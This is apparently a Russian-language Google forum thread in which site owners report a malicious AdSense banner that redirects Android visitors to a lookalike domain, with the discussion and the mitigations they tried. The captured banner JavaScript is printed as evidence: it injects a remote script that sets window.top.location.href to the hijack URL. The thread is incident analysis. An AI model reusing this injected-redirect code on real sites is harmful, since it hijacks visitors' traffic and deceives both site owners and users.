Вредоносные рекламные блоки в AdSense
Сегодня столкнулся на своём сайте с волной жалоб об автоматическом пробросе на внешний сайт без явного клика на баннер. Проблема проявляется только в браузерах для платформы Android. В ходе разбора выяснилось, что один и рекламных блоков меняет location.href и перебрасывает на левую страницу.
Поймать этот вредоносный баннер можно на http://www.opennet.ru/test/1.html (там только код AdSense) Если почистить Cookie и поставить в User Agent идентификатор Chrome для Android, то через несколько перезагрузок страницы переброс ловится.
Переброс осуществляется на http://www.opennet.ru.tinymp.com/uc.php затем на
Свойственные для проблемного баннера обращения к AdSense:
http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2075278885744463&output=html&h=90&slotname=4566802230&adk=1478762637&w=728&lmt=1419108108&flash=0&url=http%3A%2F%2Fwww.opennet.ru%2Ftest%2F1.html&dt=1419108108910&bdt=237&shv=r20141209&cbv=r20141212&saldr=sb&correlator=8570335602463&frm=20&ga_vid=1479378496.1419108112&ga_sid=1419108112&ga_hid=972738505&ga_fc=0&u_tz=300&u_his=3&u_java=1&u_h=900&u_w=1440&u_ah=850&u_aw=1440&u_cd=24&u_nplug=6&u_nmime=73&dff=serif&dfs=16&adx=720&ady=30&biw=1440&bih=454&eid=317150304&oid=3&rx=0&eae=0&fc=8&brdim=%2C%2C0%2C25%2C1440%2C25%2C1440%2C826%2C1440%2C454&vis=1&abl=XS&ppjl=u&fu=0&bc=1&ifi=1&xpc=31n2UrKVDS&p=http%3A//www.opennet.ru&dtd=3013
http://adx.stcounter.com/adx.js?kcid=51435b3f35749150bf000801&cid=%%CAMPAIGN_ID%%&size=728x90&tw=%%TARGET_WINDOW%%&clt=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DCoo2lEN-VVPj3C8GIZMq_gKACnrylugbm3J-QvwGgq8CpWxABIABghP3xhcgeggEXY2EtcHViLTIwNzUyNzg4ODU3NDQ0NjOgAfqC2OADyAEJqQJWuZpsh25SPqgDAZgEAKoEdk_QKl8hbpVffAgmiS6jzsT3HGHCJJyQjWLskFIyO7or4xTPlEHmv8rxg3dhgiaAdrM3JZ10QK2MskLnKoBbnkK2lVDyaconC7ovmQpPdXsEm84oXuUAX5XmZrQyQNpzIKglfP5EPJeF2zCd0azwfdWJxDpl-yugBiE%26num%3D1%26sig%3DAOD64_0Z4Kf-FA3h0PmInn27loC2ltc3qw%26client%3Dca-pub-2075278885744463%26adurl%3D&atf=%%ATF%%&fq=%20%20%20%20%20-1&url=&cb=1962283525
http://googleads.g.doubleclick.net/pagead/adview?ai=CzVkCEN-VVPj3C8GIZMq_gKACnrylugbm3J-QvwGgq8CpWxABIABghP3xhcgeggEXY2EtcHViLTIwNzUyNzg4ODU3NDQ0NjOgAfqC2OADyAEJqQJWuZpsh25SPqgDAZgEAKoEdk_QKl8hbpVffAgmiS6jzsT3HGHCJJyQjWLskFIyO7or4xTPlEHmv8rxg3dhgiaAdrM3JZ10QK2MskLnKoBbnkK2lVDyaconC7ovmQpPdXsEm84oXuUAX5XmZrQyQNpzIKglfP5EPJeF2zCd0azwfdWJxDpl-yuIBdaX8TuSBQYIAxACGAGgBiE&sigh=ObijYOCrkhE&vis=1
Проблемный JavaScript код, который вызывает переход:
try{function callKonvertaZP(src) {if (typeof(src) == 'undefined') return; var d = document, b=d.body; if(src.toUpperCase().indexOf('HTTP://')==0||src.toUpperCase().indexOf('HTTPS://')==0) try{var img = d.createElement('IMG'); var s = src.replace(/%random%/, Math.round(Math.random()*9999999)); with(img.style){position = 'absolute'; width = '0px'; height = '0px';} img.src = s; b.insertBefore(img, b.firstChild);}catch(e){}}
var konverta_ad_href = '';
try{konverta_ad_href=(window.top || window.self).location.href;konverta_ad_href=encodeURIComponent(konverta_ad_href);}catch(e){}
function trackKonvertaClick() {callKonvertaZP('http://adclick.g.doubleclick.net/aclk?sa=l&ai=Coo2lEN-VVPj3C8GIZMq_gKACnrylugbm3J-QvwGgq8CpWxABIABghP3xhcgeggEXY2EtcHViLTIwNzUyNzg4ODU3NDQ0NjOgAfqC2OADyAEJqQJWuZpsh25SPqgDAZgEAKoEdk_QKl8hbpVffAgmiS6jzsT3HGHCJJyQjWLskFIyO7or4xTPlEHmv8rxg3dhgiaAdrM3JZ10QK2MskLnKoBbnkK2lVDyaconC7ovmQpPdXsEm84oXuUAX5XmZrQyQNpzIKglfP5EPJeF2zCd0azwfdWJxDpl-yugBiE&num=1&sig=AOD64_0Z4Kf-FA3h0PmInn27loC2ltc3qw&client=ca-pub-2075278885744463&adurl=');}
(function() {
var wc = document.createElement('script'); wc.type = 'text/javascript'; wc.async = true;
wc.src = 'https://pix.stcounter.com/wcjs2.php?r=www.opennet.ru&r2=Mozilla%2F5.0+%28Linux%3B+Android+4.4.2%3B+Nexus+4+Build%2FKOT49H%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F34.0.1847.114+Mobile+Safari%2F537.36';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wc, s);
})();
callKonvertaZP('http://pix.stcounter.com/adx.gif?bid=514b006435749149c2000007&rnd=%random%');}catch(e){}
В частности, кусок
wc.src = 'https://pix.stcounter.com/wcjs2.php?r=www.opennet.ru&r2=Mozilla%2F5.0+%28Linux%3B+Android+4.4.2%3B+Nexus+4+Build%2FKOT49H%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F34.0.1847.114+Mobile+Safari%2F537.36';
приводит к получению строки
setTimeout("window.top.location.href='http://www.opennet.ru.tinymp.com/uc.php?random=1ee46b4c2993b711f28045af1b2e3edb';", 100);
которая затем выполняется кодом:
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wc, s);
Полный архив со слепком скриптов в момент появления вредоносного баннера - http://www.opennet.ru/test/1.tgz (проблемный код в 1_files/ads_data/adx.js)

сегодня случайно заметил на своем сайте.
Пытаюсь сообщить в гугл, но они не отвечают.
Народ на форумах просто не понимает масштабов аферы.
Люди: ваш трафик уводится через редирект на другой сайт.
Посреднком выступает google Adwords, который молчит с 21-го декабря. а на дворе уже 11 января.

Но и без этого было сразу понятно, что проблема не во вредоносном ПО, так как по коду видно, что это HTML5-баннер подставляет редирект (при вставках вредоносным ПО совсем другие особенности, как правило, в начало или конец добавляется явно выделяющийся кусок javascript, обычно запутанный).
Кстати, 25 декабря тот вредоносный баннер исчез. Для большей надёжности отключил в настройках AdSense динамические баннеры. С тех пор жалоб от пользователей пока не поступало.
Но я лично на этой неделе видел похожие мошеннические баннеры на сайте thevarguy.com - выводится окно, которое маскируется под диалог о необходимости принять условия обеспечения приватности, но на деле кидает куда-то во вне. Особо с этим случаем не разбирался, на thecarguy полно каких-то левых блоков, лишь бегло заметил, что в том всплывшем диалоге в ссылке был googleadservices.com.

wc.src = 'https://pix.stcounter.com
Попробую дать конкретику:
1. Гугл включил в показы "левого" рекламодателя, возможно это его дочерняя контора.
2. трафик с сайтов воруется посредстовм и перенаправляется на партнерские программы в зависимости от условий: мобильный оператор, ОСь.
5. Достоверно известно, что ситуация продолжается с 18-го декабря и что с 21 декабря о ней было заявлено в Гугл.

В целях избежания воровства моего траффика был вынужден переключиться на только текстовые объявления





Значки
Некоторые участники могут получать значки, которые отражают, в каком качестве и насколько активно они вносят вклад в работу сообщества.
Уровни
Уровень участника отражает его активность на форумах: чем активнее пользователь, тем выше его уровень. Каждый участник изначально находится на уровне 1 и может подняться до уровня 10. Вот какие достижения помогают увеличивать уровень:
- вы ответили на вопрос;
- ваш ответ признан лучшим;
- пользователь отметил, что ему помогло ваше сообщение;
- вы оценили сообщение другого участника как полезное или бесполезное;
- вы обоснованно пожаловались на тему или сообщение.
Если ваше сообщение было удалено в связи с жалобами других пользователей, ваш уровень будет повышаться медленнее.
Вы хотите просмотреть профиль участника?
Это страница справки. Просматривать профили участников форума на ней нельзя.
Вы хотите пожаловаться на комментарий?
Этот комментарий размещен на форуме по продукту Google. А это страница справки, здесь нельзя подать жалобу.
Вы хотите ответить на комментарий?
Этот комментарий размещен на форуме по продукту Google. А это страница справки, здесь нельзя переписываться с пользователями.